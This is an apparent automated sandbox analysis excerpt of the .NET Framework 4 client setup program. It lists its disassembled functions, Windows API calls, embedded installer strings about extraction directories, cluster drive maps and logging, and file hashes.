                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,?,?,?,?,?,000178B7,?,?), ref: 00017B01
                                                                                                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,?,000178B7,?,?,?,?,?,?,?,?,?,?,00016F09), ref: 00017B0A
                                                                                                                                                                      • Part of subcall function 0001746A: UuidCreate.RPCRT4(?), ref: 00017496
                                                                                                                                                                      • Part of subcall function 0001746A: RpcStringFreeW.RPCRT4(00000000), ref: 000174FF
                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,000178B7,?,?), ref: 00017B60
                                                                                                                                                                    • RemoveDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,000178B7,?,?), ref: 00017B6E
                                                                                                                                                                    • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,?,?,?,000178B7,?,?), ref: 00017B7C
                                                                                                                                                                    • SetErrorMode.KERNELBASE(?,?,?,?,?,000178B7,?,?), ref: 00017BE1
                                                                                                                                                                    Strings
                                                                                                                                                                    • Unable to generate random directory name, xrefs: 00017BF3
                                                                                                                                                                    • Failed to allocate long path, xrefs: 00017BFA
                                                                                                                                                                    • %s%s, xrefs: 00017B2B
                                                                                                                                                                    • Unable to generate random name, xrefs: 00017BEC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorMode$CreateDirectory$FileFreeMoveRemoveStringUuid
                                                                                                                                                                    • String ID: %s%s$Failed to allocate long path$Unable to generate random directory name$Unable to generate random name
                                                                                                                                                                    • API String ID: 1102146613-1274944306
                                                                                                                                                                    • Opcode ID: 8ad37264d1d925ddc8547c79ae266ae125da0cc63e616e8120224d6cf1472fed
                                                                                                                                                                    • Instruction ID: 69b253011b60fe6c0482ac4fa19da0cb40d82014d192890807fde2b1a5bc3cd2
                                                                                                                                                                    • Opcode Fuzzy Hash: 8ad37264d1d925ddc8547c79ae266ae125da0cc63e616e8120224d6cf1472fed
                                                                                                                                                                    • Instruction Fuzzy Hash: 30313E71D08269EFCF21AFE48CC19DEBAB9AF04714F21856AE605B2112DB744FC19B91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00017CD0 Relevance: 16.7, APIs: 2, Strings: 9, Instructions: 178COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 951 17cd0-17d00 call 187eb 954 17d02 951->954 955 17d14-17d1d call 1805a 951->955 956 17d07-17d0f call 1854a 954->956 961 17d26 955->961 962 17d1f-17d24 955->962 963 17e80-17e83 956->963 964 17d2d-17d32 961->964 962->956 965 17e85-17e88 call 18e6f 963->965 966 17e8d-17e90 963->966 969 17d34-17d3e GetLastError 964->969 970 17d5c-17d6a 964->970 965->966 967 17e92-17e95 call 18e6f 966->967 968 17e9a-17e9d 966->968 967->968 973 17ead-17eb0 968->973 974 17e9f-17ea6 968->974 975 17d40-17d4c 969->975 976 17d4e 969->976 983 17d97-17da4 970->983 984 17d6c-17d76 GetLastError 970->984 981 17ec0-17ec3 973->981 982 17eb2-17eb9 973->982 974->973 979 17ea8 974->979 975->976 977 17d50 976->977 978 17d55-17d5a 976->978 977->978 978->956 979->973 986 17ed3-17ed8 981->986 987 17ec5-17ecc 981->987 982->981 985 17ebb 982->985 990 17e3c-17e45 call 18341 983->990 988 17d86 984->988 989 17d78-17d84 984->989 985->981 987->986 991 17ece 987->991 993 17d88 988->993 994 17d8d-17d92 988->994 989->988 996 17da9-17dac 990->996 997 17e4b-17e50 990->997 991->986 993->994 994->956 999 17e52-17e5d 996->999 1000 17db2-17de1 call 184c7 call 17ee0 996->1000 998 17e6b-17e72 call 1854a 997->998 1001 17e73-17e76 998->1001 999->1001 1011 17de3-17de6 1000->1011 1012 17e5f-17e64 1000->1012 1001->963 1005 17e78-17e7b call 18e6f 1001->1005 1005->963 1013 17de8-17e0d call 184c7 call 18abb 1011->1013 1014 17e0f-17e1e 1011->1014 1012->998 1013->1014 1023 17e66 1013->1023 1019 17e20-17e23 call 18e6f 1014->1019 1020 17e28-17e39 1014->1020 1019->1020 1020->990 1023->998
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 000187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018802
                                                                                                                                                                      • Part of subcall function 000187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018809
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00017780,?,00000000,00000000,X?f,?,?,00016F09,?,?,00000000), ref: 00017D34
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00017780,?,00000000,00000000,X?f,?,?,00016F09,?,?,00000000), ref: 00017D6C
                                                                                                                                                                      • Part of subcall function 000184C7: GetLocalTime.KERNEL32(?,?,00000000), ref: 000184E2
                                                                                                                                                                      • Part of subcall function 000184C7: swprintf.LIBCMT ref: 00018513
                                                                                                                                                                    Strings
                                                                                                                                                                    • Drive map for cluster resource '%S' : '%S', xrefs: 00017DEE
                                                                                                                                                                    • Failed to get the next resource in the cluster enum, xrefs: 00017E4B
                                                                                                                                                                    • Failed to allocate an empty drive map, xrefs: 00017D02
                                                                                                                                                                    • Failed to concatenate to the cluster drive map, xrefs: 00017E66
                                                                                                                                                                    • Failed to get cluster drive map from resource, xrefs: 00017E5F
                                                                                                                                                                    • Considering cluster resource: '%S'..., xrefs: 00017DB5
                                                                                                                                                                    • Failed to initialize the Cluster API, xrefs: 00017D1F
                                                                                                                                                                    • Failed to open the clsuter enumeration for resources, xrefs: 00017D8D
                                                                                                                                                                    • Failed to open the current cluster, xrefs: 00017D55
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorHeapLast$AllocLocalProcessTimeswprintf
                                                                                                                                                                    • String ID: Considering cluster resource: '%S'...$Drive map for cluster resource '%S' : '%S'$Failed to allocate an empty drive map$Failed to concatenate to the cluster drive map$Failed to get cluster drive map from resource$Failed to get the next resource in the cluster enum$Failed to initialize the Cluster API$Failed to open the clsuter enumeration for resources$Failed to open the current cluster
                                                                                                                                                                    • API String ID: 196121278-1807027133
                                                                                                                                                                    • Opcode ID: ab354f9c462a6aecb8b03ecdfd72e754a8998e17d1d7fce28eb545512319a32b
                                                                                                                                                                    • Instruction ID: 339f965fc4abe695e7077b1c7fba22a5c1bbb60cb06356c700072e29cbe1281d
                                                                                                                                                                    • Opcode Fuzzy Hash: ab354f9c462a6aecb8b03ecdfd72e754a8998e17d1d7fce28eb545512319a32b
                                                                                                                                                                    • Instruction Fuzzy Hash: A0512A76C0421AAFCF21AFE4DC858EEBAF5AF08300F2545B9E619B7151DB350EC09B91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001B07F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 169timeCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1024 1b07f-1b0a2 1025 1b234-1b23c 1024->1025 1026 1b0a8-1b0a9 1024->1026 1027 1b243 1025->1027 1028 1b23e-1b241 1025->1028 1029 1b15a-1b174 call 18b7e 1026->1029 1030 1b0af-1b0b0 1026->1030 1031 1b246-1b24a 1027->1031 1028->1031 1036 1b226-1b22a 1029->1036 1040 1b17a-1b17f 1029->1040 1033 1b0b2-1b0b3 1030->1033 1034 1b0be-1b0da DosDateTimeToFileTime 1030->1034 1033->1036 1037 1b0b9 1033->1037 1038 1b0fd-1b10c FindCloseChangeNotification 1034->1038 1039 1b0dc-1b0ec LocalFileTimeToFileTime 1034->1039 1036->1025 1042 1b22c-1b22f call 18e6f 1036->1042 1037->1025 1043 1b14b-1b155 1038->1043 1044 1b10e-1b128 call 18b7e 1038->1044 1039->1038 1041 1b0ee-1b0f7 SetFileTime 1039->1041 1046 1b181-1b18c 1040->1046 1047 1b196-1b1b6 call 196c7 call 191d3 1040->1047 1041->1038 1042->1025 1045 1b224 1043->1045 1044->1036 1052 1b12e-1b138 1044->1052 1045->1036 1071 1b18e call 169b0 1046->1071 1072 1b18e call 164d8 1046->1072 1047->1036 1059 1b1b8-1b1da call 19ca3 1047->1059 1069 1b13a call 169b0 1052->1069 1070 1b13a call 164d8 1052->1070 1053 1b190-1b194 1053->1047 1055 1b143-1b146 1053->1055 1055->1036 1058 1b13d-1b141 1058->1043 1058->1055 1062 1b1dc-1b1e6 GetLastError 1059->1062 1063 1b1ff-1b210 SetFilePointer 1059->1063 1064 1b1f6 1062->1064 1065 1b1e8-1b1f4 1062->1065 1066 1b221 1063->1066 1067 1b212-1b21f SetEndOfFile SetFilePointer 1063->1067 1064->1036 1068 1b1f8-1b1fd 1064->1068 1065->1064 1066->1045 1067->1066 1068->1036 1069->1058 1070->1058 1071->1053 1072->1053
                                                                                                                                                                    APIs
                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0001B0D2
                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0001B0E4
                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 0001B0F7
                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0001B100
                                                                                                                                                                    • GetLastError.KERNEL32(?,40000000,00000001,00000002,08000080,?,00000000), ref: 0001B1DC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$File$ChangeCloseDateErrorFindLastLocalNotification
                                                                                                                                                                    • String ID: %s%S
                                                                                                                                                                    • API String ID: 604158762-4203644592
                                                                                                                                                                    • Opcode ID: 5a4f2cefa02dc0aefd0e8d7135a3a8a91601ffd58297967e230a4cbaa37cb24f
                                                                                                                                                                    • Instruction ID: 1875cdb06d5a0326164c6c9d3c30131a6c45d6b2b59a5d88888529a053943392
                                                                                                                                                                    • Opcode Fuzzy Hash: 5a4f2cefa02dc0aefd0e8d7135a3a8a91601ffd58297967e230a4cbaa37cb24f
                                                                                                                                                                    • Instruction Fuzzy Hash: 25516E75A00706BBEB219FE5DC80BFA77E8EF08310F108529FA15D6151DBB4DA84CB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001AB0C Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115memoryfileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1073 1ab0c-1ab3a call 19b6a 1076 1ac51-1ac61 call 291d5 1073->1076 1077 1ab40-1ab55 ReadFile 1073->1077 1078 1ab57-1ab62 GetLastError 1077->1078 1079 1ab86-1ab8a 1077->1079 1081 1ab71-1ab74 1078->1081 1082 1ab64-1ab6e 1078->1082 1083 1ab98-1abb0 GetProcessHeap HeapAlloc 1079->1083 1084 1ab8c-1ab93 1079->1084 1081->1076 1086 1ab7a-1ab81 1081->1086 1082->1081 1087 1abb2-1abb9 1083->1087 1088 1abbe-1abcb 1083->1088 1084->1076 1086->1076 1087->1076 1089 1abce-1abe9 ReadFile 1088->1089 1090 1ac01-1ac0c GetLastError 1089->1090 1091 1abeb-1abf1 1089->1091 1093 1ac1b-1ac1e 1090->1093 1094 1ac0e-1ac18 1090->1094 1091->1089 1092 1abf3-1abf6 1091->1092 1097 1ac29-1ac2f 1092->1097 1098 1abf8-1abff 1092->1098 1095 1ac20-1ac27 1093->1095 1096 1ac32-1ac35 1093->1096 1094->1093 1095->1096 1096->1076 1099 1ac37-1ac4a GetProcessHeap HeapFree 1096->1099 1097->1096 1098->1096 1099->1076 1100 1ac4c call 19a29 1099->1100 1100->1076
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00019B6A: SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00019B82
                                                                                                                                                                      • Part of subcall function 00019B6A: GetLastError.KERNEL32(?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00015AF6,X?f), ref: 00019B8C
                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00019ECF,00000024,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,00019ECF,?), ref: 0001AB4D
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00019ECF,?,?,00016163,?,?,?,00000000,00000000), ref: 0001AB57
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0001AB9C
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0001ABA3
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,?,00000024,00000000), ref: 0001ABE1
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0001AC3B
                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0001AC42
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$File$ErrorLastProcessRead$AllocFreePointer
                                                                                                                                                                    • String ID: $
                                                                                                                                                                    • API String ID: 1504513977-3993045852
                                                                                                                                                                    • Opcode ID: d3a7a1693e2d08e7c31983e8da72649645f83855e77888a99dc6f62216986788
                                                                                                                                                                    • Instruction ID: a94cc14e6084c81afc04f8b835f9b28ba72159c53fe917574fd745561504d5c7
                                                                                                                                                                    • Opcode Fuzzy Hash: d3a7a1693e2d08e7c31983e8da72649645f83855e77888a99dc6f62216986788
                                                                                                                                                                    • Instruction Fuzzy Hash: C8414B71E01218EFCF119FA9ED88AEDBBB9FF49710B108419F511E6111D3749880DFA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000185B2 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 104COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1361 185b2-185ef 1362 18702-18705 1361->1362 1363 185f5-185fb 1361->1363 1364 186df-186e5 1362->1364 1363->1362 1365 18601-18617 GetModuleFileNameW 1363->1365 1368 186f2-18701 call 291d5 1364->1368 1369 186e7-186ed call 18e6f 1364->1369 1366 18619-18627 call 2de40 1365->1366 1367 1862a-18647 call 19a63 1365->1367 1366->1367 1377 18649-1864b 1367->1377 1378 1864d-18653 1367->1378 1369->1368 1379 18659-1866f GetComputerNameW 1377->1379 1378->1379 1380 18671-1867f call 2de40 1379->1380 1381 18682-18691 call 18e9c 1379->1381 1380->1381 1386 18693-186d4 call 184c7 * 3 1381->1386 1387 186dc-186de 1381->1387 1393 186d9 1386->1393 1387->1364 1393->1387
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 0001860A
                                                                                                                                                                    • _memset.LIBCMT ref: 00018622
                                                                                                                                                                    • GetComputerNameW.KERNEL32(?,?), ref: 00018667
                                                                                                                                                                    • _memset.LIBCMT ref: 0001867A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Name_memset$ComputerFileModule
                                                                                                                                                                    • String ID: --- logging level: %s ---$=== Logging started: %S ===$Executable: %S v%d.%d.%d.%d$standard
                                                                                                                                                                    • API String ID: 949451329-1073105773
                                                                                                                                                                    • Opcode ID: cfa8e1e710044b6d2fa0e7a004c1e571b6d89dd8232b83a4b355f70af1a7cb09
                                                                                                                                                                    • Instruction ID: 5043d6840d2a4463e884d208057156b1cca036664ac294ea3fc86a85f17c4469
                                                                                                                                                                    • Opcode Fuzzy Hash: cfa8e1e710044b6d2fa0e7a004c1e571b6d89dd8232b83a4b355f70af1a7cb09
                                                                                                                                                                    • Instruction Fuzzy Hash: 483184F290022CABDB21AB559C45EDAB7FCEB44704F1081A6B709E2142DE759FC58BA4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00016F5C Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 76COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000082,00000000,00017016,X?f,?,?,00000000,X?f,?,?,?,00016F09,?,?,00000000), ref: 00016FD6
                                                                                                                                                                    • DialogBoxParamW.USER32(00000000,?,?,00016F09,?), ref: 00016FDD
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get current directory, xrefs: 00016F8F
                                                                                                                                                                    • Failed to select current directory for extraction, xrefs: 00016FA0
                                                                                                                                                                    • X?f, xrefs: 00016F63, 00016FC9
                                                                                                                                                                    • Failed to select the user-specified directory for extraction, xrefs: 00016FFA
                                                                                                                                                                    • Failed to select temporary directory for extraction, xrefs: 00016FB8
                                                                                                                                                                    • Failed while running the extract directory selection dialog., xrefs: 00016FE9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DialogHandleModuleParam
                                                                                                                                                                    • String ID: Failed to get current directory$Failed to select current directory for extraction$Failed to select temporary directory for extraction$Failed to select the user-specified directory for extraction$Failed while running the extract directory selection dialog.$X?f
                                                                                                                                                                    • API String ID: 3900296288-2009531167
                                                                                                                                                                    • Opcode ID: 71193d733ddf07c5540625584439e4b9942d4734862182815a68e0bc35665d56
                                                                                                                                                                    • Instruction ID: 146b20e26d1a041dc41b0ff3323a0f68b483c599f8adbbf8d6853d2f6fd89f08
                                                                                                                                                                    • Opcode Fuzzy Hash: 71193d733ddf07c5540625584439e4b9942d4734862182815a68e0bc35665d56
                                                                                                                                                                    • Instruction Fuzzy Hash: BD11CB32949B10AECF376A54AC41CFA77E8DB94770320413EF958A7146E9668EC34691
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001A46E Relevance: 13.6, APIs: 9, Instructions: 63memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,000161FB,00000000,00000000,?,?,?,?,?,00015B19,?,?,?,X?f), ref: 0001A476
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,000161FB,00000000,00000000,?,?,?,?,?,00015B19,?,?,?), ref: 0001A494
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,00015B19,?,?,?,X?f), ref: 0001A497
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,000161FB,00000000,00000000,?,?,?,?,?,00015B19,?,?,?), ref: 0001A4AC
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,00015B19,?,?,?,X?f), ref: 0001A4AF
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,000161FB,00000000,00000000,?,?,?,?,?,00015B19,?,?,?), ref: 0001A4C4
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,00015B19,?,?,?,X?f), ref: 0001A4C7
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,000161FB,00000000,00000000,?,?,?,?,?,00015B19,?,?,?), ref: 0001A4EF
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,00015B19,?,?,?,X?f), ref: 0001A4F2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$FreeProcess$ChangeCloseFindNotification
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 128005546-0
                                                                                                                                                                    • Opcode ID: 8231aca45148f39e1a8cd4d501d8f326eba6f17aa509a2b5ae7a28602e468478
                                                                                                                                                                    • Instruction ID: a003e93f5e1bdc4f59659da668c97805dc491ddb7e9e44213c21601ae39a7f75
                                                                                                                                                                    • Opcode Fuzzy Hash: 8231aca45148f39e1a8cd4d501d8f326eba6f17aa509a2b5ae7a28602e468478
                                                                                                                                                                    • Instruction Fuzzy Hash: 63014070701211ABEB60BBF69D49FEB3ADC9FD1B91F448011FD04D7186EAA4DC808A72
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00019A63 Relevance: 10.6, APIs: 7, Instructions: 88memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileVersionInfoSizeW.KERNELBASE(?,?,00000000,?,00000208,?,?,?,?), ref: 00019A98
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 00019AA4
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 00019AD0
                                                                                                                                                                    • GetFileVersionInfoW.KERNELBASE(?,?,00000000,00000000,?,?,?,?), ref: 00019AEC
                                                                                                                                                                    • VerQueryValueW.VERSION(?,000150AC,?,?,?,?,?,?), ref: 00019B06
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 00019B10
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00019B49
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileGlobalInfoLastVersion$AllocFreeQuerySizeValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2886811419-0
                                                                                                                                                                    • Opcode ID: 030734fbb11974196d914fffe7de86e68d6823660ba7b12b2ee9e7f0fb553ea9
                                                                                                                                                                    • Instruction ID: cec809136959f539b67a6b5457b8b45be7fa04313c4ff6f2cbce3d251d2ab386
                                                                                                                                                                    • Opcode Fuzzy Hash: 030734fbb11974196d914fffe7de86e68d6823660ba7b12b2ee9e7f0fb553ea9
                                                                                                                                                                    • Instruction Fuzzy Hash: EA317F76D04119EFDB20AFA4DD988EDBBB4EF08310B168179EE06E7211D3359E90DB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000191D3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000000,?,00000000,X?f,?,?,?,00016F20,?,00000000,?,?,00000000,?,?,00015B53), ref: 000191F9
                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(00000000,?,?,?,00016F20,?,00000000,?,?,00000000,?,?,00015B53,?,?,?), ref: 00019210
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00016F20,?,00000000,?,?,00000000,?,?,00015B53,?,?,?,?,?), ref: 0001921E
